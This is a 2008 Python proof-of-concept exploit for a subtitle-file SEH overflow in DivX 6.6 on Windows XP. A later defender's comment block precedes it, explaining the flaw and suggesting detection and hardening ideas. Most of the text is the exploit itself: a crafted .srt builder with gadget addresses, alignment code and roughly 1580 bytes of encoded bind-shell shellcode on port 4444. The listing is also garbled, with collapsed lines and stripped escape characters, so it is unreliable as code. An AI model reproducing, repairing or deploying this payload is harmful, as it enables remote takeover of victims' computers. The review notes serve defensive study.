
divx66.py.txt

Posted on 19 April 2008

# ---------------------------------------------------------------------------
# Review notes (defender's reading of this 2008 proof-of-concept listing)
#
# What the script does: it writes ONE local file, the .srt subtitle named in
# `file`, containing a single cue (index "1", one timestamp line) followed by
# the oversized string `bindshell`, then prints three banner lines. The script
# itself sends nothing over the network; the effect the author describes
# (a "Venetian" bind shell on port 4444) would only occur when a vulnerable
# DivX 6.6 player on XP SP2 parses that file.
#
# Vulnerability class: SEH (Structured Exception Handler) overwrite triggered
# by an over-long subtitle line. The header comment "file = name of avi video
# file" is misleading: `file` is the OUTPUT .srt path, not a video.
#
# Why the payload looks the way it does: the author's notes ("Unicode buffer",
# "Venetian", "alternating 00 01 surface") indicate the target converts the
# subtitle text to a wide-character buffer before the overflow, which
# constrains every payload byte - presumably why the "x6D"/"x40" pairs recur
# throughout (NOTE(review): inferred from the comments, confirm against the
# original advisory).
#
# As shown on this page the listing is not valid Python: the original line
# breaks have been collapsed and the string escape sequences were mangled in
# extraction. It is retained verbatim as a historical artifact, not repaired.
#
# Detection / mitigation points grounded in the constants below:
#   - The generated .srt exceeds 5 MB (`rest` alone is 5,000,000 bytes, on top
#     of a 1032-byte `buffer`) yet holds a single two-line cue. A subtitle
#     file whose size is wildly out of proportion to its cue count is a strong
#     anomaly signal for a media player, a mail gateway or a file scanner.
#   - Long runs of one repeated byte (the 0x41, 0x01 and 0x70 fills) inside a
#     format that should contain short human-readable lines are a cheap
#     content-based indicator (constructed rule idea, untested).
#   - Parser hardening: bound the subtitle line length before copying into a
#     fixed-size buffer; build with SafeSEH and run under DEP/SEHOP/ASLR so an
#     overwritten exception record cannot redirect execution.
#   - Scope: Python 2 syntax (`print "..."`) and a hard-coded XP SP2 / DivX 6.6
#     target; affected and fixed product versions are not stated on this page.
# ---------------------------------------------------------------------------
#!/usr/bin/python ####################################################################### # DivX 6.6 SRT SEH overwrite PoC # Tested on XP SP2 # Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD # muts..at..offensive-security...dot..com # chris..at..offensive-security...dot..com # http://www.offensive-security.com/0day/divx66.py.txt # Notes: Unicode buffer - real pita. # Greetz to our wives - thanks for the couch! ####################################################################### # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Documents and SettingsAdministratorDesktop> ####################################################################### # file = name of avi video file file="infidel.srt" # Unicode friendly POP POP RET somewhere in DivX 6.6 # Note: x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods ret="x94x48" # Align stack for register save nudge="x48x6d" # Payload building blocks buffer="x41" * 1032 xchg="x94x6d" # Swap back EAX, ESP for stack save,nop pushad="x60x6d" # Save stack registers,nop pushfd="x9cx6d" align_buffer="x05xFFx3Cx6Dx2Dxe1x3Cx6Dx2DxFFx10x6Dx05xFFx10x6D" # Point to end of buffer align_eax="x2Dx2Fx10x6Dx05x10x10x6D" # Align EAX for popad/fd popfd="x9Dx6D" # popfd,nop popad="x61x6D"# popad,nop padding="x70x70x70x70x70x70x70x70x70x70x70x70x70x70" # Crawl with remaining strength on bleeding knees to shellcode rest= "x01" * 5000000 # Buffer and shellcode canvas # PoC Venetian Bindshell on port 4444 - ph33r # Built on alternating 00 01 surface # Venetian self decoding bindshell - 1580 bytes bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer + "x80xFBx6Dx40x6Dx80x6Ax6Dx40x6Dx80xEAx6Dx40x6Dx80" "x4Dx6Dx40x6Dx80xE7x6Dx40x6Dx80xF9x6Dx40x6Dx80xFE" "x6Dx40x6Dx80xFFx6Dx40x6Dx80xFEx6Dx40x6Dx80x60x6D" "x40x6Dx80x8Ax6Dx40x6Dx80x6Cx6Dx40x6Dx80x23x6Dx40" "x6Dx80x24x6Dx40x6Dx80x8Ax6Dx40x6Dx80x45x6Dx40x6D" 
"x80x3Bx6Dx40x6Dx80x8Bx6Dx40x6Dx80x7Bx6Dx40x6Dx80" "x05x6Dx40x6Dx80x77x6Dx40x6Dx80x01x6Dx40x6Dx80xEE" "x6Dx40x6Dx80x8Bx6Dx40x6Dx80x4Ex6Dx40x6Dx80x18x6D" "x40x6Dx80x8Ax6Dx40x6Dx80x5Fx6Dx40x6Dx80x1Fx6Dx40" "x6Dx80x01x6Dx40x6Dx80xEAx6Dx40x6Dx80x49x6Dx40x6D" "x80x8Ax6Dx40x6Dx80x34x6Dx40x6Dx80x8Ax6Dx40x6Dx80" "x01x6Dx40x6Dx80xEDx6Dx40x6Dx80x31x6Dx40x6Dx80xBF" "x6Dx40x6Dx80x99x6Dx40x6Dx80xABx6Dx40x6Dx80x84x6D" "x40x6Dx80xBFx6Dx40x6D" "x80x74x6Dx40x6Dx80x06x6Dx40x6Dx80xC1x6Dx40x6Dx80" "xC9x6Dx40x6Dx80xEFx6Dx80x1Ex6Dx40x6Dx40x6Dx80xC2" "x6Dx40x6Dx80xEAx6Dx40x6Dx80xF4x6Dx40x6Dx80x3Ax6D" "x40x6Dx80x54x6Dx40x6Dx80x23x6Dx40x6Dx80x28x6Dx40" "x6Dx80x74x6Dx40x6Dx80xE5x6Dx40x6Dx80x8Ax6Dx40x6D" "x80x5Fx6Dx40x6Dx80x23x6Dx40x6Dx80x01x6Dx40x6Dx80" "xEAx6Dx40x6Dx80x66x6Dx40x6Dx80x8Ax6Dx40x6Dx80x0C" "x6Dx40x6Dx80x4Ax6Dx40x6Dx80x8Bx6Dx40x6Dx80x5Ex6D" "x40x6Dx80x1Cx6Dx40x6Dx40x6Dx80xEBx6Dx40x6Dx80x02" "x6Dx40x6Dx80x2Cx6Dx40x6Dx80x8Ax6Dx40x6Dx80x89x6D" "x40x6Dx80x6Bx6Dx40x6Dx80x24x6Dx40x6Dx80x1Bx6Dx40" "x6Dx80x61x6Dx40x6Dx80xC2x6Dx40x6Dx80x31x6Dx40x6D" "x80xDAx6Dx40x6Dx80x64x6Dx40x6Dx80x8Ax6Dx40x6Dx80" "x43x6Dx40x6Dx80x2Fx6Dx40x6Dx80x8Bx6Dx40x6Dx80x3F" "x6Dx40x6Dx80x0Cx6Dx40x6Dx80x8Ax6Dx40x6Dx80x70x6D" "x40x6Dx80x1Bx6Dx40x6Dx80xADx6Dx40x6Dx80x8Ax6Dx40" "x6Dx80x40x6Dx40x6Dx80x07x6Dx40x6Dx80x5Ex6Dx40x6D" "x80x67x6Dx40x6Dx80x8Ex6Dx40x6Dx80x4Dx6Dx40x6Dx80" "x0Ex6Dx40x6Dx80xEBx6Dx40x6Dx80x50x6Dx40x6Dx80xFE" "x6Dx40x6Dx80xD6x6Dx40x6Dx80x65x6Dx40x6Dx80x53x6D" "x40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6Dx80x32x6Dx40" "x6Dx80x32x6Dx40x6Dx80x67x6Dx40x6Dx80x77x6Dx40x6D" "x80x72x6Dx40x6Dx80x32x6Dx40x6Dx80x5Ex6Dx40x6Dx80" "x54x6Dx40x6Dx80xFEx6Dx40x6Dx80xD0x6Dx40x6Dx80x67" "x6Dx40x6Dx80xCBx6Dx40x6Dx80xECx6Dx40x6Dx80xFCx6D" "x40x6Dx80x3Ax6Dx40x6Dx80x50x6Dx40x6Dx80xFEx6Dx40" "x6Dx80xD6x6Dx40x6Dx80x5Ex6Dx40x6Dx80x89x6Dx40x6D" "x80xE4x6Dx40x6Dx80x66x6Dx40x6Dx80x80x6Dx40x6Dx80" "xEDx6Dx40x6Dx80x07x6Dx40x6Dx80x02x6Dx40x6Dx80x54" "x6Dx40x6Dx80x6Ax6Dx40x6Dx80x01x6Dx40x6Dx80xFFx6D" 
"x40x6Dx80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xD8x6Dx40" "x6Dx80x09x6Dx40x6Dx80xF4x6Dx40x6Dx80xADx6Dx40x6D" "x80x56x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80" "x53x6Dx40x6Dx80x52x6Dx40x6Dx80x53x6Dx40x6Dx80x52" "x6Dx40x6Dx80x53x6Dx40x6Dx80x42x6Dx40x6Dx80x53x6D" "x40x6Dx80x42x6Dx40x6Dx80x53x6Dx40x6Dx80xFEx6Dx40" "x6Dx80xD0x6Dx40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6D" "x80x10x6Dx40x6Dx80x5Cx6Dx40x6Dx80x65x6Dx40x6Dx80" "x53x6Dx40x6Dx80x88x6Dx40x6Dx80xE1x6Dx40x6Dx80x94" "x6Dx40x6Dx80x68x6Dx40x6Dx80xA3x6Dx40x6Dx80x1Ax6D" "x40x6Dx80x6Fx6Dx40x6Dx80xC7x6Dx40x6Dx80x56x6Dx40" "x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80x6Ax6Dx40x6D" "x80x0Fx6Dx40x6Dx80x51x6Dx40x6Dx80x54x6Dx40x6Dx80" "xFFx6Dx40x6Dx80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xA3" "x6Dx40x6Dx80xADx6Dx40x6Dx80x2Dx6Dx40x6Dx80xE9x6D" "x40x6Dx80x56x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40" "x6Dx80x53x6Dx40x6Dx80x54x6Dx40x6Dx80xFFx6Dx40x6D" "x80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xE4x6Dx40x6Dx80" "x49x6Dx40x6Dx80x85x6Dx40x6Dx80x49x6Dx40x6Dx80x56" "x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80x50x6D" "x40x6Dx80x53x6Dx40x6Dx80x54x6Dx40x6Dx80x54x6Dx40" "x6Dx80xFFx6Dx40x6Dx80xCFx6Dx40x6Dx80x93x6Dx40x6D" "x80x67x6Dx40x6Dx80xE7x6Dx40x6Dx80x78x6Dx40x6Dx80" "xC6x6Dx40x6Dx80x78x6Dx40x6Dx80x57x6Dx40x6Dx80xFE" "x6Dx40x6Dx80xD6x6Dx40x6Dx80x54x6Dx40x6Dx80xFFx6D" "x40x6Dx80xCFx6Dx40x6Dx80x66x6Dx40x6Dx80x69x6Dx40" "x6Dx80x64x6Dx40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6D" "x80x62x6Dx40x6Dx80x6Dx6Dx40x6Dx80x88x6Dx40x6Dx80" "xE5x6Dx40x6Dx80x69x6Dx40x6Dx80x50x6Dx40x6Dx80x58" "x6Dx40x6Dx80x29x6Dx40x6Dx80xCBx6Dx40x6Dx80x89x6D" "x40x6Dx80xE6x6Dx40x6Dx80x6Ax6Dx40x6Dx80x43x6Dx40" "x6Dx80x89x6Dx40x6Dx80xE1x6Dx40x6Dx80x31x6Dx40x6D" "x80xBFx6Dx40x6Dx80xF3x6Dx40x6Dx80xA9x6Dx40x6Dx80" "xFEx6Dx40x6Dx80x41x6Dx40x6Dx80x2Dx6Dx40x6Dx80xFD" "x6Dx40x6Dx80x42x6Dx40x6Dx80x2Bx6Dx40x6Dx80x93x6D" "x40x6Dx80x8Cx6Dx40x6Dx80x7Ax6Dx40x6Dx80x37x6Dx40" "x6Dx80xABx6Dx40x6Dx80xAAx6Dx40x6Dx80xABx6Dx40x6D" "x80x67x6Dx40x6Dx80x72x6Dx40x6Dx80xFDx6Dx40x6Dx80" "xB3x6Dx40x6Dx80x15x6Dx40x6Dx80xFFx6Dx40x6Dx80x74" 
"x6Dx40x6Dx80x44x6Dx40x6Dx80xFEx6Dx40x6Dx80xD6x6D" "x40x6Dx80x5Ax6Dx40x6Dx80x57x6Dx40x6Dx80x51x6Dx40" "x6Dx80x51x6Dx40x6Dx80x50x6Dx40x6Dx80x51x6Dx40x6D" "x80x69x6Dx40x6Dx80x01x6Dx40x6Dx80x50x6Dx40x6Dx80" "x51x6Dx40x6Dx80x54x6Dx40x6Dx80x51x6Dx40x6Dx80xFE" "x6Dx40x6Dx80xD0x6Dx40x6Dx80x67x6Dx40x6Dx80xADx6D" "x40x6Dx80xD8x6Dx40x6Dx80x05x6Dx40x6Dx80xCDx6Dx40" "x6Dx80x53x6Dx40x6Dx80xFEx6Dx40x6Dx80xD6x6Dx40x6D" "x80x69x6Dx40x6Dx80xFFx6Dx40x6Dx80xFEx6Dx40x6Dx80" "x37x6Dx40x6Dx80xFEx6Dx40x6Dx80xD0x6Dx40x6Dx80x8A" "x6Dx40x6Dx80x57x6Dx40x6Dx80xFBx6Dx40x6Dx80x83x6D" "x40x6Dx80xC3x6Dx40x6Dx80x64x6Dx40x6Dx80xFEx6Dx40" "x6Dx80xD6x6Dx40x6Dx80x51x6Dx40x6Dx80xFFx6Dx40x6D" "x80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xEEx6Dx40x6Dx80" "xCEx6Dx40x6Dx80xDFx6Dx40x6Dx80x60x6Dx40x6Dx80x52" "x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80xFFx6D" "x40x6Dx80xCFx6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest) f=open(file,'w') f.write("1 ") f.write("00:00:01,001 --> 00:00:02,001 ") f.write(bindshell) f.close() print "DivX 6.6 SEH SRT Overflow - PoC "; print "http://www.offensive-security.com/0day/divx66.py.txt "; print "SRT has been created - ph33r ";

 
